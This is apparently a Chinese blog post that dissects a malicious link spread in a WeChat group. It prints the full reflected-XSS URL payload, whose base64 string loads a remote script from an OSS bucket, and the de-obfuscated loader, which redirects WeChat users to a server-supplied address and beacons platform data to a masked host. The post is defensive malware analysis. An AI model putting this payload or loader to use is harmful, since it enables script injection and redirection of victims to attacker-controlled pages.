群裡有這樣一個連結,因為是防疫群是不可能邀請大家參加婚禮的。

于是乎好奇的點選了,然而浏覽器并沒有反應。
複制連結後,發現是這樣一個奇怪的網址:
https://xxxx.com/mall/index.html?click_type=768123%27;setTimeout(atob(%27dmFyIHNzID0gZG9jdW1lbnQxY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7IHNzLnNyYyA9ICIvL3F3ZTEyMzMyMS5vc3MtY24tYmVpamluZy5hbGl5dW5jcy5jb20vanMvbXNnMjEuanMiOyBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQoc3MpOw==%27)%2c1);//
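%27 轉碼後是 '(單引号):它提前閉合了頁面腳本裡原本的字串,後面的内容就被當成代碼執行。由此推測,該頁面把 click_type 的值未經轉義直接拼進了腳本,屬于反射型 XSS。
%2c1 轉碼後是 ,1,即 setTimeout 的第二個參數;結尾的 // 則把頁面原有的剩餘代碼注釋掉。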
setTimeout( ):延遲執行傳入的代碼字串;第二個參數的單位是毫秒,這裡的 1 表示約 1 毫秒後執行,而不是一秒。
atob( ):base64 解碼函數(base64 只是編碼,不是加密,任何人都能還原)
解碼後是一小段 JS:建立一個 script 元素,把它的 src 指向下面這個位址,再插入頁面,從而載入外部腳本:http://xxxxxx.oss-cn-beijing.aliyuncs.com/js/msg21.js
打開後發現是一個經過混淆(俗稱「加密」)的 JS。
因為是用 jsjiami.com v5 混淆的,這塊我沒有接觸過,JS 的内容暫時無法知道。但作者既然不想讓人看到,代碼裡面肯定沒幹好事;至于是盜号、推廣還是廣告,就不得而知。
所以:陌生的連結、帶有誘惑性的連結,都不要點。
當然,這種包含惡意代碼的連結,平台也會很快屏蔽。
以後有機會可以研究一下js解密。
更新一下
__________________________________________
解密後的JS
// NOTE(review): the leading numbers (1, 2, 3, ...) are gutter line numbers carried
// over from the blog listing; they are not part of the script.
//
// De-obfuscated loader. Read straight through, it does this:
//   - checks whether the visitor is WeChat (user agent contains "micromessenger")
//     on a platform whose name starts with neither "Win" nor "Mac", with a
//     WeChat version number of 7 or higher;
//   - if so, fetches a base64 string from a server endpoint, decodes it and
//     navigates to the decoded value;
//   - otherwise POSTs navigator.platform to a randomly named ".xml" path and
//     navigates to "#", i.e. stays on the current page.
// Defensive takeaway: the redirect is gated on the client environment, so opening
// the link in a desktop browser shows nothing, which would match the "no
// reaction" reported in the article. The two network calls in this listing (the
// POST to <base>/<random>.xml with body "platform=..." and the fetch of
// .../zhuanfa/index/getUrl4) are the observable indicators.
1 (function () {
// Lookup table produced by the obfuscator: string constants plus one-line
// wrappers for +, ===, &&, < and plain function calls. The code below routes its
// operations through this table, which hides the real control flow.
2 var _0xaeeadd = {
3 'fKPML': function _0x14f0f0(_0x5c3713, _0x1a63d4) {
4 return _0x5c3713 + _0x1a63d4;
5 },
6 'QCLsm': '(^|&)',
7 'KhmkX': '=([^&]*)(&|$)',
8 'pkwUU': function _0x32d898(_0xc21c09, _0x5cb8e1) {
9 return _0xc21c09(_0x5cb8e1);
10 },
11 'NImgf': function _0x33b8ae(_0x482fe5, _0x29be10) {
12 return _0x482fe5 === _0x29be10;
13 },
14 'MnKMf': 'Win',
15 'FNPcq': 'Mac',
16 'MiFij': function _0x354ab1(_0x1c1e1b, _0x1383fa) {
17 return _0x1c1e1b && _0x1383fa;
18 },
19 'xlxNW': 'uYi',
20 'HlNCM': function _0xb671d6(_0x5415a8) {
21 return _0x5415a8();
22 },
23 'xbyII': function _0x430a35(_0x4d7c9d, _0x138736) {
24 return _0x4d7c9d < _0x138736;
25 },
26 'PggWd': 'POST',
27 'pmkHt': 'Content-Type',
28 'DqzsN': 'application/x-www-form-urlencoded',
29 'VfEeh': 'rel',
30 'VjhJK': 'noreferrer',
31 'CPxCm': 'href',
32 'dsBeQ': 'type',
33 'FVmgL': function _0x1ec231(_0x598e3f, _0x42ad76) {
34 return _0x598e3f(_0x42ad76);
35 },
36 'swpDV': 'sid',
37 'DIwHW': 'aid',
38 'fSiTS': function _0x3f03f3(_0x2009ea, _0x990f9) {
39 return _0x2009ea(_0x990f9);
40 },
// Endpoint fetched by the redirect step, and base URL used by the beacon. The
// host names appear to have been masked in the listing (xxxx / xxx.xx).
41 'iKdOU': 'https://xxxx/zhuanfa/index/getUrl4',
42 'iijAp': 'https://www.xxx.xx',
43 'SRGif': function _0x5aeb01(_0x3cabc9) {
44 return _0x3cabc9();
45 },
46 'OyAtk': function _0x3c3206(_0x2d909a) {
47 return _0x2d909a();
48 },
49 'EysgW': 'dev',
// The string below is a console label meaning "[development mode]".
50 'WtgwP': '【開發模式】',
51 'RECbh': function _0x54cbc9(_0x2eebf6) {
52 return _0x2eebf6();
53 },
54 'IWljf': 'vvT',
55 'EAyvE': function _0x26768c(_0x4b9384) {
56 return _0x4b9384();
57 },
58 'MBeJk': function _0x695c5e(_0x5e669c) {
59 return _0x5e669c();
60 }
61 };
62
// Query-string getter: builds /(^|&)<name>=([^&]*)(&|$)/i, runs it against
// location.search without the leading "?", and returns the unescape()d value or
// null when there is no match. The name is concatenated into the pattern as-is;
// when the function is called with no argument, the default null is
// concatenated as the text "null".
63 function _0x3aae30(_0x542f79 = null) {
64 var _0x529546 = new RegExp(_0xaeeadd['fKPML'](_0xaeeadd['QCLsm'], _0x542f79) + _0xaeeadd['KhmkX'], 'i');
65 var _0x31b98d = window['location']['search']['substr'](0x1)['match'](_0x529546);
66 if (_0x31b98d != null) return _0xaeeadd['pkwUU'](unescape, _0x31b98d[0x2]);
67 return null;
68 }
69
// Environment test 1: returns true only when the user agent contains
// "micromessenger" and navigator.platform starts with neither "Win" nor "Mac".
70 function _0x12824a() {
71 const _0x162822 = navigator['platform'];
72 const _0x175089 = _0xaeeadd['NImgf'](_0x162822['indexOf'](_0xaeeadd['MnKMf']), 0x0);
73 const _0xae94b8 = _0x162822['indexOf'](_0xaeeadd['FNPcq']) === 0x0;
74 const _0x3dcc2c = /micromessenger/ ['test'](navigator['userAgent']['toLowerCase']());
75 if (_0xaeeadd['MiFij'](_0x3dcc2c, !_0x175089) && !_0xae94b8) {
76 return !![];
77 } else {
// Opaque predicate: 'FTI' !== 'uYi' is always true, so this path always returns
// false and the inner else below is dead code inserted by the obfuscator.
78 if ('FTI' !== _0xaeeadd['xlxNW']) {
79 return ![];
80 } else {
81 _0xaeeadd['HlNCM'](_0x72f538);
82 _0xaeeadd['pkwUU'](_0x191d64, '#');
83 }
84 }
85 }
86
// Environment test 2: extracts the number that follows "micromessenger" in the
// lower-cased user agent and returns true when parseFloat() of it is >= 7.
// Returns false when the user agent does not contain "micromessenger".
87 function _0x775b3a() {
88 const _0x4f64dc = navigator['userAgent']['toLowerCase']();
89 const _0x1860d3 = /micromessenger/;
90 let _0x53b8bc = ![];
91 if (_0x1860d3['test'](_0x4f64dc)) {
92 const _0x1b8303 = _0x4f64dc['search'](_0x1860d3);
93 let _0x244c59 = '';
// Start 15 (0xf) characters after the match start: the 14-character token plus
// one more character (presumably the "/" before the version; confirm against a
// real user agent). Collect digits and dots, stop at the first other character.
94 for (let _0xa894d5 = _0x1b8303 + 0xf; _0xaeeadd['xbyII'](_0xa894d5, _0x4f64dc['length']); _0xa894d5++) {
95 const _0x55e4d3 = _0x4f64dc[_0xa894d5];
96 if (/^\d{1,}$/ ['test'](_0x55e4d3) || _0xaeeadd['NImgf'](_0x55e4d3, '.')) {
97 _0x244c59 += _0x55e4d3;
98 } else {
99 break;
100 }
101 }
// parseFloat() reads only the leading "major.minor" part of the collected text.
102 _0x244c59 = parseFloat(_0x244c59);
103 if (_0x244c59 >= 0x7) _0x53b8bc = !![];
104 }
105 return _0x53b8bc;
106 }
// Base URL for the beacon request below.
107 var _0x320916 = _0xaeeadd['iijAp'];
108
// Beacon: asynchronous, form-encoded POST of navigator.platform to
// <base>/<random token>.xml. No response handler is attached, so the reply is
// never read. The token (_0x1f1b99) is declared further down, on listing line
// 135; every call to this function in the listing comes after that line.
109 function _0x72f538() {
110 var _0x31ca84 = new XMLHttpRequest();
111 _0x31ca84['open'](_0xaeeadd['PggWd'], _0x320916 + '/' + _0x1f1b99 + '.xml', !![]);
112 _0x31ca84['setRequestHeader'](_0xaeeadd['pmkHt'], _0xaeeadd['DqzsN']);
113 _0x31ca84['send']('platform=' + navigator['platform']);
114 }
115
// Navigation helper: creates <a rel="noreferrer" href=...>, appends it to
// document.body and clicks it. rel="noreferrer" asks the browser to omit the
// Referer header, so the destination does not see which page sent the visitor.
116 function _0x191d64(_0x2d7909) {
117 const _0xe8c4a5 = document['createElement']('a');
118 _0xe8c4a5['setAttribute'](_0xaeeadd['VfEeh'], _0xaeeadd['VjhJK']);
119 _0xe8c4a5['setAttribute'](_0xaeeadd['CPxCm'], _0x2d7909);
120 document['body']['appendChild'](_0xe8c4a5);
121 _0xe8c4a5['click']();
122 }
123
// Redirect step: fetches the endpoint stored under 'iKdOU', treats the response
// text as base64, decodes it with atob() and navigates to the decoded value. The
// destination is therefore supplied by the server at request time and does not
// appear anywhere in this script.
// The type / sid / aid query parameters are read and a "?type=...&aid=..." string
// is built, but neither that string nor sid is used anywhere in this listing.
124 function _0x5ee876() {
125 const _0x507d4c = _0x3aae30(_0xaeeadd['dsBeQ']);
126 const _0x52e6be = _0xaeeadd['FVmgL'](_0x3aae30, _0xaeeadd['swpDV']);
127 const _0x3b61df = _0x3aae30(_0xaeeadd['DIwHW']);
128 let _0x2b07b8 = '';
129 if (_0x507d4c) {
130 _0x2b07b8 = '?type=' + _0x507d4c + '&aid=' + _0x3b61df;
131 }
132 _0xaeeadd['fSiTS'](fetch, _0xaeeadd['iKdOU'])['then'](_0x2f8c1a => _0x2f8c1a['text']())['then'](_0x147f1f =>
133 _0x191d64(atob(_0x147f1f)));
134 }
// Random base-36 token, used as the file name in the beacon URL.
135 const _0x1f1b99 = Math['random']()['toString'](0x24)['substr'](0x2);
// Dispatch. A visitor that fails either environment test takes the first branch.
136 if (!_0x12824a() || !_0xaeeadd['SRGif'](_0x775b3a)) {
// _0x3aae30() is called without a name here and returns a string or null, so the
// ['dev'] lookup on the result yields undefined; this "dev mode" branch looks
// unreachable in practice.
137 const _0xa26fef = _0xaeeadd['OyAtk'](_0x3aae30);
138 if (_0xa26fef && _0xa26fef[_0xaeeadd['EysgW']]) {
139 console['log'](_0xaeeadd['WtgwP']);
140 _0xaeeadd['OyAtk'](_0x5ee876);
141 } else {
// Non-target visitor: send the beacon, then navigate to "#" (same page).
142 _0xaeeadd['RECbh'](_0x72f538);
143 _0x191d64('#');
144 }
145 } else {
// Target visitor. 'vvT' === 'Cgo' is always false (another opaque predicate), so
// only the final else runs: go straight to the redirect step.
146 if (_0xaeeadd['NImgf'](_0xaeeadd['IWljf'], 'Cgo')) {
147 console['log'](_0xaeeadd['WtgwP']);
148 _0xaeeadd['EAyvE'](_0x5ee876);
149 } else {
150 _0xaeeadd['MBeJk'](_0x5ee876);
151 }
152 }
153 }());;
// NOTE(review): the leading numbers are gutter line numbers from the blog
// listing, not part of the script.
//
// Trailer appended by the obfuscation tool (the marker string is
// 'jsjiami.com.v5'). It is independent of the redirect logic above: it only
// checks that the global encode_version still holds the tool's marker and calls
// window.alert() with a nag message when it does not.
154 (function (_0xe5cddc, _0xb8de6b, _0x4ff679) {
155 var _0x1b14d7 = {
156 'Kyljy': 'undefined',
157 'syTvc': 'jsjiami.com.v5',
// Alert text; it says roughly "delete the version number and the js will show
// pop-ups periodically".
158 'GkGtd': '删除版本号,js會定期彈窗'
159 };
// The method name "alert" is assembled from 'al' + 'ert' so that the literal
// does not appear in the source.
160 _0x4ff679 = 'al';
161 try {
162 _0x4ff679 += 'ert';
// Reading an undeclared encode_version throws a ReferenceError, which lands in
// the catch block below.
163 _0xb8de6b = encode_version;
164 if (!(typeof _0xb8de6b !== _0x1b14d7['Kyljy'] && _0xb8de6b === _0x1b14d7['syTvc'])) {
// Same nag message with "please support our work" appended.
165 _0xe5cddc[_0x4ff679]('删除' + '版本号,js會定期彈窗,還請支援我們的工作');
166 }
167 } catch (_0x3249a0) {
168 _0xe5cddc[_0x4ff679](_0x1b14d7['GkGtd']);
169 }
// Only the first parameter is supplied (window); the other two are used as
// scratch variables.
170 }(window));;
// NOTE(review): in this listing encode_version is assigned only here, after the
// check above has already run, and no earlier declaration is visible. The
// original file may have declared it at the top (not shown) - confirm.
171 encode_version = 'jsjiami.com.v5'
這個 JS 背後對應一個 TP(應指 ThinkPHP)後台,并且對應非常多的域名。至于這個後台在這些域名下收集什麼資訊,就不扒了,水準有限。
__________________________________________________________________________________
作者:劉俊濤的部落格